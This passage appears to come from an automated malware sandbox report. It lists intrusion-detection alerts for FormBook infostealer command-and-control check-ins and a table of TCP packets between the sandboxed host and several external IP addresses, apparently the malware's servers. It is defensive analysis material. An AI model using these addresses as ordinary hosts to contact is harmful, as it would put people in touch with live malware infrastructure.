                                                                                2024-12-14T13:51:04.317728+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549959209.74.77.10780TCP
                                                                                2024-12-14T13:51:07.404255+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549965209.74.77.10780TCP
                                                                                2024-12-14T13:51:10.137287+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549974209.74.77.10780TCP
                                                                                2024-12-14T13:51:12.742743+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549981209.74.77.10780TCP
                                                                                2024-12-14T13:51:12.742743+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549981209.74.77.10780TCP
                                                                                2024-12-14T13:51:19.636546+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999884.32.84.3280TCP
                                                                                2024-12-14T13:51:22.304891+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000484.32.84.3280TCP
                                                                                2024-12-14T13:51:24.980711+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001284.32.84.3280TCP
                                                                                2024-12-14T13:51:27.644739+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55002084.32.84.3280TCP
                                                                                2024-12-14T13:51:27.644739+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55002084.32.84.3280TCP
                                                                                2024-12-14T13:51:35.606703+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550028154.208.202.22580TCP
                                                                                2024-12-14T13:51:38.352647+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550029154.208.202.22580TCP
                                                                                2024-12-14T13:51:41.083079+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550030154.208.202.22580TCP
                                                                                2024-12-14T13:51:44.674370+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550031154.208.202.22580TCP
                                                                                2024-12-14T13:51:44.674370+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550031154.208.202.22580TCP
                                                                                2024-12-14T13:51:51.687251+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55003277.68.64.4580TCP
                                                                                2024-12-14T13:51:54.365294+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55003377.68.64.4580TCP
                                                                                2024-12-14T13:51:57.217666+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55003477.68.64.4580TCP
                                                                                2024-12-14T13:51:59.883911+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55003577.68.64.4580TCP
                                                                                2024-12-14T13:51:59.883911+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55003577.68.64.4580TCP
                                                                                2024-12-14T13:52:07.434173+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550038208.91.197.2780TCP
                                                                                2024-12-14T13:52:10.170829+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550039208.91.197.2780TCP
                                                                                2024-12-14T13:52:12.932527+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550040208.91.197.2780TCP
                                                                                2024-12-14T13:52:15.991017+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550041208.91.197.2780TCP
                                                                                2024-12-14T13:52:15.991017+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550041208.91.197.2780TCP
                                                                                2024-12-14T13:52:22.793820+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55004284.32.84.3280TCP
                                                                                2024-12-14T13:52:25.457591+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55004384.32.84.3280TCP
                                                                                2024-12-14T13:52:28.132803+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55004484.32.84.3280TCP
                                                                                2024-12-14T13:52:30.801841+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55004584.32.84.3280TCP
                                                                                2024-12-14T13:52:30.801841+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55004584.32.84.3280TCP
                                                                                2024-12-14T13:52:37.562250+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550046104.21.77.7180TCP
                                                                                2024-12-14T13:52:40.212187+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550047104.21.77.7180TCP
                                                                                2024-12-14T13:52:42.888647+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550048104.21.77.7180TCP
                                                                                2024-12-14T13:52:45.557053+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550049104.21.77.7180TCP
                                                                                2024-12-14T13:52:45.557053+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550049104.21.77.7180TCP
                                                                                2024-12-14T13:52:52.336545+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550050172.67.220.3680TCP
                                                                                2024-12-14T13:52:55.020976+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550051172.67.220.3680TCP
                                                                                2024-12-14T13:52:57.703236+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550052172.67.220.3680TCP
                                                                                2024-12-14T13:53:00.357479+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550053172.67.220.3680TCP
                                                                                2024-12-14T13:53:00.357479+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550053172.67.220.3680TCP
                                                                                2024-12-14T13:53:07.609519+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550054162.0.217.3580TCP
                                                                                2024-12-14T13:53:10.281537+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550057162.0.217.3580TCP
                                                                                2024-12-14T13:53:12.937669+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550058162.0.217.3580TCP
                                                                                2024-12-14T13:53:15.421804+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550059162.0.217.3580TCP
                                                                                2024-12-14T13:53:15.421804+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550059162.0.217.3580TCP
                                                                                2024-12-14T13:53:22.487121+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55006081.2.196.1980TCP
                                                                                2024-12-14T13:53:25.152051+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55006181.2.196.1980TCP
                                                                                2024-12-14T13:53:28.184283+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55006281.2.196.1980TCP
                                                                                2024-12-14T13:53:30.855901+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55006381.2.196.1980TCP
                                                                                2024-12-14T13:53:30.855901+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55006381.2.196.1980TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 14, 2024 13:49:59.202604055 CET4980180192.168.2.5154.12.28.184
                                                                                Dec 14, 2024 13:49:59.322382927 CET8049801154.12.28.184192.168.2.5
                                                                                Dec 14, 2024 13:49:59.322552919 CET4980180192.168.2.5154.12.28.184
                                                                                Dec 14, 2024 13:49:59.332856894 CET4980180192.168.2.5154.12.28.184
                                                                                Dec 14, 2024 13:49:59.452615023 CET8049801154.12.28.184192.168.2.5
                                                                                Dec 14, 2024 13:50:00.870424986 CET8049801154.12.28.184192.168.2.5
                                                                                Dec 14, 2024 13:50:00.870496988 CET8049801154.12.28.184192.168.2.5
                                                                                Dec 14, 2024 13:50:00.870709896 CET4980180192.168.2.5154.12.28.184
                                                                                Dec 14, 2024 13:50:00.874100924 CET4980180192.168.2.5154.12.28.184
                                                                                Dec 14, 2024 13:50:00.993895054 CET8049801154.12.28.184192.168.2.5
                                                                                Dec 14, 2024 13:50:16.923512936 CET4984380192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:17.043487072 CET804984313.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:17.043605089 CET4984380192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:17.064775944 CET4984380192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:17.184695005 CET804984313.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:18.578499079 CET4984380192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:18.630604982 CET804984313.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:18.630647898 CET804984313.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:18.630799055 CET4984380192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:18.630799055 CET4984380192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:18.698548079 CET804984313.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:18.698699951 CET4984380192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:19.598078012 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:19.718147039 CET804984913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:19.718460083 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:19.732862949 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:19.853974104 CET804984913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:21.234518051 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:21.308003902 CET804984913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:21.308087111 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:21.308115959 CET804984913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:21.308163881 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:21.354676962 CET804984913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:21.354748011 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:22.253864050 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:22.373676062 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:22.377718925 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:22.392061949 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:22.511764050 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:22.511874914 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:23.906363010 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:24.187650919 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:24.187675953 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:24.187840939 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:24.187875986 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:24.188128948 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:24.188177109 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:24.234249115 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:24.234440088 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:24.926492929 CET4986580192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:25.046547890 CET804986513.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:25.046947956 CET4986580192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:25.056581974 CET4986580192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:25.176795959 CET804986513.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:26.635133982 CET804986513.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:26.635174036 CET804986513.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:26.635453939 CET4986580192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:26.638294935 CET4986580192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:26.758090973 CET804986513.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:31.971522093 CET4988280192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:32.091306925 CET8049882172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:32.091428041 CET4988280192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:32.105751991 CET4988280192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:32.225502014 CET8049882172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:33.366174936 CET8049882172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:33.366254091 CET8049882172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:33.366324902 CET4988280192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:33.366661072 CET8049882172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:33.366758108 CET4988280192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:33.620709896 CET4988280192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:34.628750086 CET4988880192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:34.748564959 CET8049888172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:34.749809980 CET4988880192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:34.765428066 CET4988880192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:34.894709110 CET8049888172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:36.030252934 CET8049888172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:36.030323029 CET8049888172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:36.030415058 CET4988880192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:36.030797958 CET8049888172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:36.030869007 CET4988880192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:36.281687975 CET4988880192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:37.301409006 CET4989580192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:37.421102047 CET8049895172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:37.421221972 CET4989580192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:37.439019918 CET4989580192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:37.558792114 CET8049895172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:37.558873892 CET8049895172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:38.711863041 CET8049895172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:38.711951971 CET8049895172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:38.712022066 CET4989580192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:38.712776899 CET8049895172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:38.712832928 CET4989580192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:38.953293085 CET4989580192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:39.971941948 CET4990180192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:40.091918945 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:40.092118025 CET4990180192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:40.101349115 CET4990180192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:40.221303940 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:41.363744020 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:41.363765001 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:41.363814116 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:41.363827944 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:41.363913059 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:41.363962889 CET4990180192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:41.364037991 CET4990180192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:41.368695021 CET4990180192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:41.489089012 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:47.176435947 CET4991780192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:47.296166897 CET8049917185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:47.296343088 CET4991780192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:47.310389996 CET4991780192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:47.430885077 CET8049917185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:48.615886927 CET8049917185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:48.615922928 CET8049917185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:48.616035938 CET4991780192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:48.812674999 CET4991780192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:49.831612110 CET4992980192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:49.951533079 CET8049929185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:49.951733112 CET4992980192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:49.967820883 CET4992980192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:50.087538004 CET8049929185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:51.276110888 CET8049929185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:51.276192904 CET8049929185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:51.276242971 CET4992980192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:51.485521078 CET4992980192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:52.507469893 CET4993580192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:52.627654076 CET8049935185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:52.627887011 CET4993580192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:52.644552946 CET4993580192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:52.764678001 CET8049935185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:52.764803886 CET8049935185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:53.957189083 CET8049935185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:53.959147930 CET8049935185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:53.959213972 CET4993580192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:54.156330109 CET4993580192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:55.175396919 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:55.295546055 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:55.295650959 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:55.304784060 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:55.424978018 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996095896 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996113062 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996274948 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:56.996841908 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996860981 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996872902 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996879101 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996890068 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996901989 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996920109 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:56.996958017 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:56.996958017 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996972084 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.997020006 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:56.998611927 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.046879053 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.116619110 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.116637945 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.116822004 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.120877981 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.120891094 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.120995998 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.129198074 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.129344940 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.129443884 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.137830973 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.137861013 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.138006926 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.146434069 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.146482944 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.146606922 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.154515982 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.154619932 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.154695988 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.163094997 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.163150072 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.163427114 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.171379089 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.171546936 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.171937943 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.174818993 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.294910908 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:51:02.952601910 CET4995980192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:03.072348118 CET8049959209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:03.072490931 CET4995980192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:03.091006041 CET4995980192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:03.211296082 CET8049959209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:04.314090967 CET8049959209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:04.314171076 CET8049959209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:04.317728043 CET4995980192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:04.604697943 CET4995980192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:05.613009930 CET4996580192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:06.179442883 CET8049965209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:06.179744005 CET4996580192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:06.195230961 CET4996580192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:06.315254927 CET8049965209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:07.403924942 CET8049965209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:07.404073954 CET8049965209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:07.404254913 CET4996580192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:07.703591108 CET4996580192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:08.723294020 CET4997480192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:08.843277931 CET8049974209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:08.843401909 CET4997480192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:08.861866951 CET4997480192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:08.984258890 CET8049974209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:08.984275103 CET8049974209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:10.137029886 CET8049974209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:10.137100935 CET8049974209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:10.137286901 CET4997480192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:10.375107050 CET4997480192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:11.394809008 CET4998180192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:11.514760017 CET8049981209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:11.514853001 CET4998180192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:11.525719881 CET4998180192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:11.647540092 CET8049981209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:12.742244959 CET8049981209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:12.742494106 CET8049981209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:12.742743015 CET4998180192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:12.745857954 CET4998180192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:12.865914106 CET8049981209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:18.412401915 CET4999880192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:18.532728910 CET804999884.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:18.532845020 CET4999880192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:18.548563004 CET4999880192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:18.669704914 CET804999884.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:19.635170937 CET804999884.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:19.636545897 CET4999880192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:20.062704086 CET4999880192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:20.183084965 CET804999884.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:21.081398010 CET5000480192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:21.201749086 CET805000484.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:21.205925941 CET5000480192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:21.220568895 CET5000480192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:21.346208096 CET805000484.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:22.304811954 CET805000484.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:22.304891109 CET5000480192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:22.738231897 CET5000480192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:22.858495951 CET805000484.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:23.756114006 CET5001280192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:23.877760887 CET805001284.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:23.877863884 CET5001280192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:23.895442963 CET5001280192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:24.015448093 CET805001284.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:24.015486956 CET805001284.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:24.977843046 CET805001284.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:24.980710983 CET5001280192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:25.409713984 CET5001280192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:25.529709101 CET805001284.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:26.425540924 CET5002080192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:26.545452118 CET805002084.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:26.545557022 CET5002080192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:26.562583923 CET5002080192.168.2.584.32.84.32
                                                                                Dec 14, 2024 13:51:26.683387041 CET805002084.32.84.32192.168.2.5
                                                                                Dec 14, 2024 13:51:27.644532919 CET805002084.32.84.32192.168.2.5
